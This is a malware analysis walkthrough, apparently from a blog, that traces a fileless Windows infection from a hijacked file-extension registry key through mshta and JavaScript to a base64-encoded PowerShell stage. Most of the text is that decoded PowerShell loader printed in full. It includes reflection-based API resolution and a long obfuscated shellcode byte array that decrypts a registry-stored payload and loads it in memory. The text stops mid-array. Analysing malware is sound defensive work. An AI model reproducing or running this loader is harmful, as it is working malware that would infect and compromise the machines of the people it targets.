Learning by Doing: Malware Analysis


News.nextcloud.asia

Back on track.

Now that we know we need to look at HKCU\Software\Classes\ada3d for information on how the extension is handled, let's do that. First, it looks like we have to descend a few levels to reach the interesting data.

After digging in, we see mshta.exe launching what appears to be some JavaScript that tries to use WScript.Shell to read the contents of HKCU\Software\ekceplfi, which is one of the entries we learned about above.

Here is a cleaner view from JSBeautifier.

After running it through SpiderMonkey, we now have some content that makes sense at the beginning and some more that makes sense at the end. In the middle, however, we have a lot of what appears to be nonsense. 🙂

Above we see FromBase64String, suggesting the content is base64-encoded. Using CyberChef to decode this content (making sense of what I called nonsense a moment ago), we see below, highlighted in yellow, what tells us we are dealing with PowerShell.

#wukbpzwjdveszmiujeofg
sleep(15);try{
#mpxrd
function gdelegate{
#gvcc
Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);
#shtnvxxbf
$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("XXX","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);
#qchm
$TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");
#zzeiqapejn
$TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");
#lskfqqq
return $TypeBuilder.CreateType();}
#cvhi
function gproc{
#tezffvn
Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);
#icaibabqun
$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("")[-1].Equals("System.dll")};
#faymzrobss
$UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");
#rvbu
return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}
#bujmhw
[Byte[]] $sc32 = 0x55,0x8B,0xEC,0x81,0xC4,0x00,0xFA,<#eg#>0xFF,0xFF,0x53,0x56,0x57,0x53,0x56,0x57,0xFC,0x31,0xD2,0x64,0x8B,0x52,0x30,0x8B,0x52,0x0C,0x8B,0x52,0x14,0x8B,0x72,0x28,<#ndl#>0x6A,0x18,0x59,0x31,0xFF,<#xo#>0x31,0xC0,0xAC,<#ifd#>0x3C,0x61,0x7C,0x02,0x2C,0x20,0xC1,0xCF,0x0D,0x01,0xC7,0xE2,0xF0,0x81,0xFF,0x5B,0xBC,0x4A,<#qu#>0x6A,0x8B,0x5A,0x10,0x8B,0x12,0x75,0xDB,0x89,0x5D,<#vkc#>0xFC,0x5F,0x5E,0x5B,0x8B,0x45,0xFC,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x0F,0x02,0x00,0x00,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,<#ulq#>0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,<#lt#>0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xE5,0x01,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0x45,0xFC,0x89,0x45,0xCC,0x8B,<#da#>0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0xCB,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,<#zq#>0xFF,0xFF,<#kbv#>0x33,0xF6,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,<#cvq#>0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,<#fys#>0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0x4D,0xFC,0x81,0x39,0x4C,0x6F,0x61,0x64,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x4C,0x69,0x62,0x72,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,<#ya#>0x61,0x72,0x79,0x41,0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,<#sl#>0x45,0xFC,0x33,0xD2,<#gj#>0x52,0x50,0x8B,0xC6,0x03,0xC0,<#anh#>0x99,0x03,0x04,0x24,0x13,<#dz#>0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#jtt#>0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xBC,0x81,0x39,0x47,0x65,0x74,<#aaw#>0x50,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x72,0x6F,0x63,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x64,0x64,0x72,0x65,0x75,0x40,0x8D,0x41,0x0E,0x80,0x38,0x00,0x75,<#jdj#>0x38,0x8B,0x45,0xCC,<#dtd#>0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,<#kb
#>0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,<#jta#>0x52,<#phr#>0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xB8,0x81,<#ros#>0x39,0x56,0x69,0x72,0x74,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x75,0x61,0x6C,0x41,0x75,0x4B,0x8D,0x41,<#gr#>0x08,<#zb#>0x81,0x38,0x6C,0x6C,0x6F,0x63,0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,<#gtc#>0xCC,0x8B,<#ua#>0x40,<#me#>0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,<#ew#>0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,<#it#>0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,<#br#>0xA8,<#no#>0x81,0x39,0x45,0x78,0x69,0x74,<#rpm#>0x75,0x63,0x8D,0x41,0x04,0x81,0x38,0x50,<#vwd#>0x72,0x6F,0x63,0x75,0x58,0x8D,<#nik#>0x41,0x08,0x80,0x38,0x65,0x75,0x50,0x8D,0x41,0x09,0x80,0x38,0x73,0x75,0x48,0x8D,0x41,0x0A,0x80,0x38,0x73,0x75,0x40,0x83,0xC1,0x0B,0x80,0x39,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,<#gt#>0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#hx#>0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#wac#>0x8B,0x52,0x1C,<#yhq#>0x03,0x55,0xFC,0x0F,0xB7,<#ub#>0xC0,0xC1,0xE0,0x02,0x03,<#xvx#>0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xA4,0x46,0xFF,0x8D,<#xi#>0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0x3E,0xFE,<#jgv#>0xFF,0xFF,0xC6,0x85,0x2F,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x30,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x31,0xFF,0xFF,0xFF,0x76,0xC6,0x85,0x32,0xFF,0xFF,<#few#>0xFF,0x61,0xC6,0x85,0x33,0xFF,0xFF,0xFF,0x70,0xC6,<#pqm#>0x85,0x34,0xFF,0xFF,0xFF,0x69,0xC6,0x85,0x35,0xFF,0xFF,0xFF,0x33,0xC6,<#ow#>0x85,<#he#>0x36,0xFF,0xFF,0xFF,0x32,0xC6,0x85,0x37,0xFF,0xFF,0xFF,0x2E,0xC6,0x85,0x38,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x39,0xFF,<#vi#>0xFF,0xFF,0x6C,0xC6,0x85,0x3A,0xFF,0xFF,0xFF,0x6C,0xC6,0x85,0x3B,0xFF,<#bwf#>0xFF,0xFF,0x00,0x8D,0x85,<#hca#>0x2F,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x75,0x05,0x6A,0x00,0xF
F,<#cz#>0x55,0xA4,0x89,0x5D,0xD4,0x8B,0x45,0xD4,0x66,<#gb#>0x81,0x38,0x4D,0x5A,0x0F,0x85,0x4F,<#gk#>0x01,0x00,0x00,0x8B,0xC3,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,<#vrg#>0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0x26,0x01,0x00,<#ff#>0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0xC3,0x89,0x45,0xCC,0x8B,0x45,0xCC,<#yr#>0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0x0D,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,<#cbm#>0x8B,0xC3,0x33,<#pdr#>0xD2,<#xuj#>0x52,0x50,<#ect#>0x8B,0x45,0xCC,<#esg#>0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,<#mw#>0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,<#llc#>0xC4,<#gc#>0x08,0x8B,0x08,0x03,0xCB,0x81,<#ca#>0x39,0x52,0x65,0x67,0x4F,0x75,0x5B,0x8D,0x41,0x04,0x81,0x38,0x70,0x65,0x6E,0x4B,0x75,0x50,0x8D,0x41,0x08,0x81,0x38,0x65,0x79,0x45,0x78,0x75,0x45,0x8D,0x41,0x0C,0x80,0x38,<#bn#>0x41,0x75,0x3D,0x8D,0x41,0x0D,0x80,0x38,0x00,0x75,<#xy#>0x35,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,<#oa#>0xC3,0x33,0xD2,<#vg#>0x52,0x50,0x8B,0xC6,<#da#>0x03,0xC0,0x99,<#ht#>0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,<#aae#>0x8B,0x52,0x1C,0x03,<#gt#>0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,0x89,0x45,0xB0,0x81,0x39,0x52,0x65,0x67,0x51,0x75,0x5E,<#pp#>0x8D,0x41,0x04,0x81,0x38,0x75,0x65,0x72,0x79,<#yht#>0x75,0x53,0x8D,0x41,0x08,0x81,0x38,0x56,0x61,0x6C,0x75,0x75,0x48,0x8D,0x41,0x0C,0x81,<#vq#>0x38,0x65,0x45,0x78,0x41,<#vh#>0x75,0x3D,0x83,0xC1,0x10,0x80,0x39,0x00,0x75,0x35,0x8B,0x45,0xCC,0x8B,0x40,<#ys#>0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,<#sw#>0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,<#smh#>0x02,0x03,0xC3,0x89,0x45,<#hj#>0xAC,0x46,0xFF,0x8D,<#dyn#>0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0xFC,0xFE,0xFF,0xFF,0x8B,<#fq#>0x45,0x08,0x05
,0x48,0x0A,0x00,<#lz#>0x00,0x89,0x85,0x7C,<#mfp#>0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE4,0x00,0x00,0x00,0x89,0x85,0x78,0xFF,0xFF,0xFF,0x33,0xDB,0x33,0xC0,0x89,<#nhq#>0x85,0x64,<#zmn#>0xFF,0xFF,0xFF,0x33,0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,<#con#>0x68,0x02,0x00,0x00,0x80,<#mla#>0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,<#efd#>0x8D,<#sry#>0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,<#ay#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,<#vgq#>0x85,0x7C,0xFF,<#fam#>0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,<#uwj#>0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,<#goi#>0x60,<#isp#>0xFF,0xFF,0xFF,<#ahc#>0x50,0x6A,<#gpr#>0x00,0xFF,0x55,<#uzi#>0xA8,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x83,<#tc#>0xBD,0x64,<#ucu#>0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x33,0xC0,0x89,0x85,<#rwz#>0x70,0xFF,0xFF,0xFF,0x84,0xDB,0x0F,0x85,0xB8,0x00,<#ut#>0x00,0x00,0x33,0xC0,0x89,0x85,<#ona#>0x64,0xFF,0xFF,0xFF,0x33,0xC0,0x89,<#btw#>0x85,<#yzx#>0x60,0xFF,0xFF,0xFF,0x8D,<#yco#>0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x01,0x00,0x00,0x80,0xFF,0x55,0xB0,<#fi#>0x85,0xC0,<#mfr#>0x0F,0x85,0x86,0x00,0x00,0x00,0x8D,0x85,0x60,0xFF,0xFF,0xFF,<#or#>0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,<#by#>0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,<#jo#>0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0x
FF,0xFF,0x00,<#cf#>0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,<#rqy#>0xFF,0xFF,0x50,0x8D,0x85,0x6C,<#em#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,<#ut#>0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x84,0xDB,0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xDC,<#hjy#>0x00,0x00,0x00,0x50,0x8B,0x85,0x7C,<#nwm#>0xFF,0xFF,0xFF,0x83,0xC0,0x52,0x50,0x8D,0x85,<#bmw#>0x00,0xFA,0xFF,0xFF,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x89,0x31,0x46,<#jd#>0x83,<#pq#>0xC1,0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xF2,0x33,0xDB,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x03,0x19,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0xFF,0xB0,0xDC,0x00,0x00,0x00,0x8B,0xC6,<#kn#>0x5A,0x8B,0xFA,0x33,0xD2,0xF7,0xF7,0x33,0xC0,0x8A,0x84,0x15,0x00,0xFA,0xFF,0xFF,0x03,0xD8,0x81,0xE3,0xFF,<#ez#>0x00,0x00,0x00,0x8A,0x01,0x8B,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x89,0x11,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0x9D,<#pgr#>0x00,0xFB,0xFF,0xFF,0x46,0x83,0xC1,0x04,<#lr#>0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xB5,0x33,0xDB,0x33,0xFF,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,<#jij#>0xA8,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x83,0xBD,0x5C,0xFF,0xFF,<#vw#>0xFF,0x00,0x74,0x29,0x8B,0x85,0x5C,0xFF,0xFF,0xFF,0x89,0x85,0x4C,0xFF,0xFF,<#iku#>0xFF,0x8B,0x85,<#js#>0x60,<#kd#>0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x50,0xFF,0x95,<#wh#>0x78,0xFF,0xFF,<#wwb#>0xFF,0xEB,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x60,0xFF,0xFF,0xFF,<#si#>0x48,0x85,0xC0,0x72,0x74,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x43,0x81,0xE3,0xFF,0x00,0x00,0x00,0x03,0xBC,0x9D,0x00,0xFB,0xFF,0xFF,0x81,0xE7,0xFF,0x00,0x00,0x00,0x8A,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x8B,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x89,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0xBD,0x00,0xFB,0xFF,0xFF,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8A,0x04,0x30,0x8B,0x9
4,0x9D,0x00,0xFB,0xFF,<#sru#>0xFF,0x03,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x81,0xE2,0xFF,0x00,0x00,0x00,0x32,0x84,0x95,0x00,0xFB,0xFF,0xFF,0x8B,0x95,0x4C,0xFF,0xFF,0xFF,0x88,<#ev#>0x04,0x32,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0x95,0x8B,0x85,0x4C,<#oq#>0xFF,0xFF,0xFF,0x89,0x45,<#ah#>0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,<#ta#>0x5A,0x0F,0x85,0xDA,0x02,0x00,0x00,0x8B,0x45,0xD4,<#qy#>0x8B,0x40,0x3C,0x03,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,<#kco#>0xD0,0x8B,0x45,0xD0,0x81,<#vo#>0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xBC,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x58,0x50,0x03,0xDB,<#xlf#>0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x53,0x6A,<#wle#>0x00,0xFF,0x55,0xA8,0x89,0x45,<#bf#>0xF8,0x83,0x7D,<#of#>0xF8,0x00,0x0F,0x84,0x9A,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,<#xp#>0x40,<#vxw#>0x54,<#vef#>0x50,0x8B,0x85,0x4C,<#ew#>0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xF8,0x50,<#bbd#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x04,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE0,0x00,<#dfh#>0x00,0x00,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xE0,0x00,0x00,0x00,0x50,<#hxe#>0x8B,<#od#>0x85,0x4C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xD0,0x8B,<#bdt#>0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x50,0xFF,0x95,0x78,<#boc#>0xFF,0xFF,0xFF,0x6A,0x60,0x8B,0x85,<#wu#>0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x7A,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x83,<#on#>0xC0,0x04,0x8B,0x95,0x7C,0xFF,<#gjg#>0xFF,0xFF,0x03,0x82,0xE0,0x00,0x00,0x00,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x0F,0xB7,0x40,0x06,0x48,0x85,0xC0,<#kiu#>0x7C,0x5F,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0x55,0xD4,0x8B,0x52,0x3C,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x03,0xD0,0x81,0xC2,0xF8,0x00,0x00,0x00,0x8B,0xCE,0xC1,0xE1,0x03,<#zr#>0x8D,0x0C,0x89,0x03,0xD1,0x89,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,<#hxa#>0x10,0x52,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x14,0x03,0xD0,0x52,0x8B,0x85,0x50,0xFF,0xFF,0xFF,0x8B,0x40,0x0C,0x03,0x45,0xF8,0x50,0xFF,<#ro#>0x95,0x78,0xFF,
0xFF,0xFF,<#yc#>0x46,0xFF,0x8D,0x3C,0xFF,0xFF,<#ypg#>0xFF,0x75,0xAA,0x8B,0x45,0xD0,0x8B,0x40,0x34,0x3B,0x45,0xF8,0x0F,0x84,0xCB,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x2B,0x50,0x34,0x89,0x55,0xD8,0x8B,0x45,<#jxt#>0xF8,0x89,0x45,0xF0,0x8B,0x45,0xD0,0x83,0xB8,0xA4,0x00,0x00,<#da#>0x00,0x00,0x0F,0x86,<#pyu#>0x87,0x00,<#kza#>0x00,0x00,0x8B,0x45,0xD0,0x8B,0x80,0xA0,0x00,<#vv#>0x00,0x00,0x03,0x45,0xF0,0x89,<#um#>0x45,0xEC,0xEB,0x6E,0x8B,0x45,0xEC,0x8B,0x00,0x03,0x45,0xF0,0x89,<#kzd#>0x45,0xE8,0x8B,0x45,0xEC,0x83,0xC0,0x08,0x89,0x45,0xE4,0x8B,0x45,0xEC,0x8B,0x40,0x04,<#frn#>0x83,0xE8,0x08,0xD1,0xE8,0x48,0x85,0xC0,0x72,0x3E,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x8B,0x45,0xE4,0x66,0x8B,0x10,0x0F,0xB7,0xC2,0xC1,0xE8,0x0C,0x8B,0xCA,0x66,0x81,0xE1,0xFF,0x0F,0x0F,0xB7,0xC9,0x83,0xF8,0x03,<#uvt#>0x75,0x10,<#dys#>0x8B,<#xss#>0x45,0xE8,0x03,0xC1,0x89,0x45,<#qsp#>0xE0,0x8B,0x45,0xE0,0x8B,0x55,0xD8,0x01,0x10,0x83,0x45,0xE4,0x02,0xFF,0x8D,0x3C,0xFF,0xFF,<#iow#>0xFF,0x75,0xC9,0x8B,0x45,0xEC,0x8B,0x40,0x04,0x03,0x45,0xEC,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x83,0x38,0x00,0x77,0x8A,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x89,0x50,0x34,0x68,0xF8,0x00,0x00,0x00,0x8B,0x45,0xD0,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,<#md#>0xFF,0x8B,0x45,0xD0,0x05,0x80,0x00,0x00,0x00,0x89,0x45,0x90,0x8B,0x45,0x90,0x83,0x78,0x04,0x00,0x0F,<#hr#>0x86,0x9E,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x80,0x80,0x00,0x00,<#has#>0x00,0x03,0x45,0xF8,<#oz#>0x89,0x45,0x8C,0xEB,0x7F,0x03,0x7D,0xF8,0x57,0xFF,0x55,0xBC,0x8B,<#qmp#>0xD8,0x85,0xDB,0x74,<#se#>0x72,0x8B,0x45,0x8C,0x83,0x38,0x00,0x74,0x0D,0x8B,0x45,0x8C,0x8B,0x00,0x03,0x45,0xF8,0x89,0x45,0x88,0xEB,<#nhi#>0x0C,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,<#zw#>0x45,0xF8,0x89,0x45,0x88,0x8B,<#re#>0x45,<#fgs#>0x8C,0x8B,0x40,<#be#>0x10,0x03,0x45,0xF8,0x89,0x45,0x84,0xEB,0x37,0x8B,0x45,0x88,<#me#>0x8B,0x30,0xF7,0xC6,0x00,0x00,0x00,0x80,<#nn#>0x74,0x12,0x81,0xE6,0xFF,0xFF,0x00,0x00,<#odn#>0x56,0x53,<#hb#>0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,0xEB,0x10
,0x03,0x75,0xF8,0x83,<#md#>0xC6,0x02,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,0x83,0x45,0x88,0x04,0x83,0x45,0x84,<#cyw#>0x04,0x8B,<#uf#>0x45,0x88,0x83,0x38,0x00,<#xfd#>0x75,<#uwx#>0xC1,<#kv#>0x83,0x45,0x8C,0x14,0x8B,0x45,0x8C,0x8B,0x78,0x0C,0x85,0xFF,0x0F,0x85,0x73,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x8B,0x40,0x28,0x03,0x45,0xF8,0x89,0x45,0xF4,0x31,0xC0,0x50,0x6A,0x01,0xFF,0x75,<#vr#>0xF8,0xFF,0x55,0xF4,0x6A,0x00,0xFF,0x55,0xA4,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x8D,<#go#>0x40,0x00,0x73,0x6F,0x66,0x74,0x77,0x61,0x72,0x65,0x5C,0x65,0x6B,0x63,0x65,0x00,0x00,<#mmq#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#xa#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x62,0x6E,0x6A,0x66,0x6F,0x65,0x00,<#vjy#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5E,0x67,0x3A,0x12,0x9A,0x95,0x15,0x63,<#zuj#>0x06,0xAF,0x82,0xDD,0xA0,0x4D,<#at#>0x53,0x85,0xF4,0x57,0xD5,<#mhv#>0x5D,0x57,0x6A,0xB0,0x69,0x4A,0x08,0xCA,0xD1,0x9F,0x4F,0xDE,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,<#ubx#>0x00,0x3C,0x00,0x3C,0x00,0x3A,0x00,0x3A,0x00,0x3E,0x00,0x3E,0x00,0x73,0x00,0x68,0x00,<#jc#>0x65,0x00,0x6C,0x00,0x6C,0x00,0x72,0x00,0x6D,0x00,0x3C,0x00,0x65,0x00,0x6B,0x00,0x63,0x00,0x65,0x00,0x3E,0x00,0x72,